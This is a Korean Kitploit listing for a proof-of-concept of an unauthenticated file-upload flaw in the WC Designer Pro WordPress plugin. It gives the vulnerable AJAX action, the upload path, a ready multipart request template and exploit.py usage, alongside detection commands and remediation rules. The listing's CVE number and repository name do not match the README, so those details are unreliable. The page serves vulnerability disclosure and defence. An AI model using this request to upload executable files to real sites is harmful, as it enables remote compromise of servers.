Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-6440-Poc-Exploit — WC Designer Pro WordPress 플러그인에 대한 인증되지 않은 원격 코드 실행 익스플로잇. 취약한 AJAX 엔드포인트를 통해 탐지, 파일 업로드 및 셸 액세스를 자동화합니다. | Kitploit
도구/GitHubGitHub/m2hcz/cve-2025-6440-poc-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubm2hcz/cve-2025-6440-poc-exploit

CVE-2025-6440-Poc-Exploit

WC Designer Pro WordPress 플러그인에 대한 인증되지 않은 원격 코드 실행 익스플로잇. 취약한 AJAX 엔드포인트를 통해 탐지, 파일 업로드 및 셸 액세스를 자동화합니다.

저장소 보기
1231개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

WC Designer Pro — 인증되지 않은 임의 파일 업로드

보안 연구 개념 증명

Python WordPress Research

CWE Severity Authentication

WC Designer Pro WordPress 플러그인에 영향을 미치는 인증되지 않은 임의 파일 업로드 취약점에 대한 비파괴적 개념 증명입니다.


목차

  • 취약점 개요
  • 보안 영향
  • 영향을 받는 버전
  • 근본 원인
  • 공격 흐름
  • 요구 사항
  • 설치
  • 사용 방법
  • 기술적 세부 사항
  • 안전한 검증
  • 노출 지표
  • 수정 조치
  • 법적 및 윤리적 사용
  • 공개 상태
  • 참고 자료
  • 크레딧

취약점 개요

WC Designer Pro에는 WordPress의 admin-ajax.php 엔드포인트를 통해 노출되는 AJAX 액션에 인증되지 않은 임의 파일 업로드 취약점이 존재합니다.

영향을 받는 핸들러는 적절한 인증, 권한 부여, 확장자 검증, MIME 유형 검증 또는 서버 측 파일 이름 제한을 적용하지 않고 사용자 제어 파일 메타데이터와 파일 내용을 처리합니다.

취약한 구성에서 인증되지 않은 공격자는 웹에서 접근 가능한 디렉터리에 서버에서 실행 가능한 파일을 업로드할 수 있습니다. 성공적인 악용은 웹 서버 프로세스 권한 하에서 원격 코드 실행으로 이어질 수 있습니다.

정확한 영향 버전 범위, CVE 식별자 및 CVSS 점수는 독립적으로 검증된 후에만 게시되어야 합니다.


보안 영향

성공적인 악용 시 인증되지 않은 공격자가 다음을 수행할 수 있습니다:

  • WordPress 설치에 승인되지 않은 파일 업로드.
  • 공개적으로 접근 가능한 업로드 디렉터리 내 파일 저장.
  • 실행 가능한 확장자가 허용되는 경우 서버 측 코드 실행.
  • 웹 서버 계정이 접근할 수 있는 데이터 읽기 또는 수정.
  • 영향을 받는 WordPress 설치 손상.
  • 손상된 서버를 추가 공격의 거점으로 사용.

최종 영향은 웹 서버 구성, PHP 실행 규칙, 파일 시스템 권한 및 호스팅 제공업체가 배포한 보안 제어에 따라 달라집니다.


영향을 받는 버전

영향을 받는 버전 범위는 현재 검증 중입니다.

root@kitploit:~
제품: WC Designer Pro
영향을 받는 버전: 확인 예정
수정 버전: 확인 예정
패치 상태: 확인 예정

테스트 또는 공급업체 확인이 해당 결론을 뒷받침하지 않는 한 모든 버전이 영향을 받는다고 명시하지 마십시오.


근본 원인

취약한 업로드 흐름은 다음 AJAX 액션에 제공된 공격자 제어 값을 신뢰하는 것으로 보입니다:

root@kitploit:~
wcdp_save_canvas_design_ajax

요청에는 다음과 같은 파일 메타데이터가 포함됩니다:

  • 파일 확장자
  • 파일 식별자
  • 대상 식별자
  • 업로드된 파일 내용

서버가 다음 모든 제어를 수행하지 않고 이러한 값을 수락할 때 취약점이 존재합니다:

  1. 인증 및 권한 부여 검사.
  2. WordPress nonce 검증.
  3. 엄격한 확장자 허용 목록.
  4. 파일 내용 기반 MIME 유형 검증.
  5. 파일 이름 정규화 및 삭제 처리.
  6. 실행 불가능한 업로드 대상 강제.
  7. 임시 파일에 대한 직접 웹 접근 방지.

공격 흐름

root@kitploit:~
인증되지 않은 요청
          │
          ▼
/wp-admin/admin-ajax.php
          │
          ▼
action=wcdp_save_canvas_design_ajax
          │
          ▼
업로드된 파일의 불충분한 검증
          │
          ▼
웹에서 접근 가능한 디렉터리에 파일 기록
          │
          ▼
잠재적 서버 측 코드 실행

관찰된 업로드 경로는 다음 구조를 따릅니다:

root@kitploit:~
/wp-content/uploads/wcdp-uploads/temp/{identifier}/{filename}

정확한 경로는 플러그인 버전, WordPress 구성 및 서버 환경에 따라 달라질 수 있습니다.


요구 사항

  • Python 3.8 이상
  • pip
  • WordPress 실험실 환경
  • 승인된 대상
  • 취약한 WC Designer Pro 설치

이 개념 증명은 명시적인 서면 승인 없이 제3자 시스템에 사용되어서는 안 됩니다.


설치

저장소를 클론합니다:

root@kitploit:~
git clone https://github.com/m2hcz/wcdp-security-poc.git
cd wcdp-security-poc

가상 환경을 생성하고 활성화합니다:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate

Windows의 경우:

root@kitploit:~
python -m venv .venv
.venv\Scripts\Activate.ps1

의존성을 설치합니다:

root@kitploit:~
pip install -r requirements.txt

requirements.txt 예시:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

사용 방법

개념 증명은 단일 승인된 실험실 대상에 대해서만 실행되어야 합니다.

root@kitploit:~
python3 exploit.py --url https://wordpress-lab.example

비파괴적 검증의 경우:

root@kitploit:~
python3 exploit.py \
  --url https://wordpress-lab.example \
  --file ./payloads/verification.txt

검증 파일 예시:

root@kitploit:~
WC Designer Pro 보안 검증
연구자: m2hcz
목적: 승인된 비파괴적 테스트

지원되는 인수를 확인하려면 내장 도움말 명령을 사용하십시오:

root@kitploit:~
python3 exploit.py --help

출력 예시:

root@kitploit:~
usage: exploit.py [-h] --url URL [--file FILE] [--timeout SECONDS]

WC Designer Pro 임의 파일 업로드 검증 PoC

options:
  -h, --help         도움말 메시지를 표시하고 종료
  --url URL          승인된 WordPress 대상
  --file FILE        무해한 검증 파일
  --timeout SECONDS  HTTP 요청 시간 초과

기술적 세부 사항

취약한 엔드포인트

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wordpress-lab.example
Content-Type: multipart/form-data; boundary=----Boundary

요청은 다음을 호출합니다:

root@kitploit:~
action=wcdp_save_canvas_design_ajax

간소화된 요청 구조는 아래와 같습니다:

root@kitploit:~
------Boundary
Content-Disposition: form-data; name="action"

wcdp_save_canvas_design_ajax
------Boundary
Content-Disposition: form-data; name="params"

{
  "mode": "save",
  "editor": "frontend",
  "uniq": "research-verification",
  "files": [
    {
      "name": "verification",
      "ext": "txt",
      "count": "file1"
    }
  ]
}
------Boundary
Content-Disposition: form-data; name="file1"; filename="verification.txt"
Content-Type: text/plain

승인된 보안 검증
------Boundary--

이 예시는 의도적으로 실행 불가능한 텍스트 파일을 사용합니다.

관찰된 응답

성공적인 요청은 다음과 유사한 응답을 반환할 수 있습니다:

root@kitploit:~
{
  "userID": false,
  "filesCMYK": [],
  "success": true
}

성공적인 응답만으로는 원격 코드 실행을 증명하지 않습니다. 연구자는 다음을 별도로 확인해야 합니다:

  1. 파일이 생성되었는지.
  2. 파일에 접근 가능한지.
  3. 대상 디렉터리가 서버 측 실행을 허용하는지.
  4. 테스트가 승인된 환경에서 수행되었는지.

안전한 검증

권장 검증 절차는 다음과 같습니다:

  1. 격리된 로컬 환경에 WordPress를 배포합니다.
  2. 의심되는 취약한 플러그인 버전을 설치합니다.
  3. 무해한 .txt 마커 파일을 생성합니다.
  4. 영향을 받는 AJAX 액션을 사용하여 마커를 제출합니다.
  5. 인증 없이 파일이 저장되었는지 확인합니다.
  6. HTTP 요청 및 응답을 기록합니다.
  7. 업로드된 마커 파일을 삭제합니다.
  8. 실험실 환경을 파기하거나 재설정합니다.

무해한 마커 파일로 취약점을 입증할 수 있는 경우 웹 셸 또는 명령 실행 페이로드를 업로드하지 마십시오.

기대 증거

유효한 보고서에는 다음이 포함되어야 합니다:

  • WordPress 버전.
  • WC Designer Pro 버전.
  • 웹 서버 및 PHP 버전.
  • 전체 HTTP 요청.
  • 전체 HTTP 응답.
  • 결과 파일 경로.
  • 인증된 세션이 사용되지 않았음을 증명.
  • 업로드된 마커를 확인하는 스크린샷 또는 로그.
  • 정리 확인.

노출 지표

관리자는 다음 디렉터리를 검사해야 합니다:

root@kitploit:~
/wp-content/uploads/wcdp-uploads/temp/

잠재적 지표는 다음과 같습니다:

  • 예상치 못한 .php, .phtml, .phar 또는 유사한 실행 파일.
  • 무작위로 이름이 지정된 하위 디렉터리.
  • 알 수 없는 사용자가 생성한 파일.
  • 영향을 받는 AJAX 액션을 사용하는 admin-ajax.php에 대한 요청.
  • 임시 업로드 디렉터리 내 새로 생성된 파일에 접근하는 HTTP 요청.
  • PHP 또는 웹 서버 프로세스에 의해 예기치 않게 생성된 하위 프로세스.

로그 검색 예시:

root@kitploit:~
grep -R "wcdp_save_canvas_design_ajax" /var/log/nginx/ /var/log/apache2/

파일 시스템 검색 예시:

root@kitploit:~
find wp-content/uploads/wcdp-uploads/temp \
  -type f \
  \( -name "*.php" -o -name "*.phtml" -o -name "*.phar" \)

수정 조치

사이트 관리자는 다음을 수행해야 합니다:

  1. 확인된 패치 버전이 제공되면 WC Designer Pro를 업데이트합니다.
  2. 패치가 없는 경우 플러그인을 비활성화하고 제거합니다.
  3. WordPress 업로드 디렉터리 내 서버 측 스크립트 실행을 차단합니다.
  4. 임시 업로드 디렉터리에서 승인되지 않은 파일을 검사합니다.
  5. 웹 서버 접근 로그에서 악용 시도를 검토합니다.
  6. 손상이 의심되는 경우 WordPress 솔트 및 관리자 자격 증명을 교체합니다.
  7. 관련된 경우 데이터베이스, 호스팅, FTP, SSH 및 API 자격 증명을 교체합니다.
  8. 확인된 손상 후 신뢰할 수 있는 소스에서 WordPress 설치를 재구축합니다.

권장 서버 구성

Nginx의 경우 업로드 내 PHP 실행을 거부합니다:

root@kitploit:~
location ~* /wp-content/uploads/.*\.php$ {
    deny all;
    return 403;
}

Apache의 경우 업로드 디렉터리 내에 적절한 규칙을 배치합니다:

root@kitploit:~
<FilesMatch "\.(php|phtml|phar|php[0-9]*)$">
    Require all denied
</FilesMatch>

이러한 제어는 심층 방어 조치이며 취약한 플러그인 코드 수정을 대체하지 않습니다.

권장 코드 수준 제어

플러그인 유지 관리자는 다음을 수행해야 합니다:

  • 적절한 경우 인증을 요구합니다.
  • current_user_can()으로 사용자 권한을 확인합니다.
  • WordPress nonce를 요구하고 검증합니다.
  • 허용된 확장자의 엄격한 허용 목록을 사용합니다.
  • wp_check_filetype_and_ext()를 사용하여 파일을 검증합니다.
  • 서버 측 파일 이름을 생성합니다.
  • 가능한 경우 웹 루트 외부에 임시 파일을 저장합니다.
  • 업로드 디렉터리에 실행 가능한 콘텐츠가 저장되지 않도록 방지합니다.
  • 내부 경로를 노출하지 않고 일반 오류를 반환합니다.

법적 및 윤리적 사용

이 저장소는 다음 용도로만 사용됩니다:

  • 승인된 침투 테스트.
  • 취약점 연구.
  • 방어적 검증.
  • 보안 교육.
  • 격리된 실험실 환경에서의 재현.

명시적 승인 없이 이 코드를 사용하여 시스템에 접근, 수정, 방해 또는 손상시키지 마십시오.

저자는 이 자료의 승인되지 않은, 불법 또는 악의적인 사용에 대해 책임을 지지 않습니다. 사용자는 적용 가능한 법률, 계약, 참여 규칙 및 조정된 취약점 공개 요구 사항을 준수할 전적인 책임이 있습니다.


공개 상태

root@kitploit:~
발견 날짜:         추가 예정
공급업체 연락:     추가 예정
공급업체 응답:     추가 예정
패치 출시:         추가 예정
CVE 요청:          추가 예정
CVE 할당:          추가 예정
공개 공개:         추가 예정

할당된 식별자인 것처럼 자리 표시자 CVE를 게시하지 마십시오.

CVE가 할당되면 자리 표시자를 공식 기록으로 교체합니다:

root@kitploit:~
CVE: CVE-YYYY-NNNNN
CVSS: 공식 또는 문서화된 연구자 평가

참고 자료

  • WordPress 플러그인 보안
  • WordPress AJAX 문서
  • OWASP 파일 업로드 치트 시트
  • OWASP 제한 없는 파일 업로드
  • CWE-434: 위험한 유형의 파일 제한 없는 업로드

크레딧

m2hcz
공격적 보안 연구자
GitHub · 포트폴리오

변경 로그

v1.0.0

  • 취약점 검증 워크플로 추가.
  • 비파괴적 마커 파일 지원 추가.
  • 엔드포인트 및 플러그인 노출 탐지 추가.
  • 구조화된 증거 수집 추가.
  • 요청 시간 초과 및 오류 처리 추가.
  • 수정 조치 및 침해 대응 지침 추가.

보안 연구는 위험을 줄여야 하지, 만들지 않아야 합니다.

m2hcz가 승인된 보안 테스트를 위해 제작.

도구 다운로드
속성값
제품WC Designer Pro
플랫폼WordPress
취약점 클래스제한 없는 임의 파일 업로드
CWECWE-434
인증 필요 여부아니요
사용자 상호작용 필요아니요
잠재적 영향원격 코드 실행
공격 복잡성낮음
취약한 구성 요소WordPress AJAX 업로드 핸들러
AJAX 액션wcdp_save_canvas_design_ajax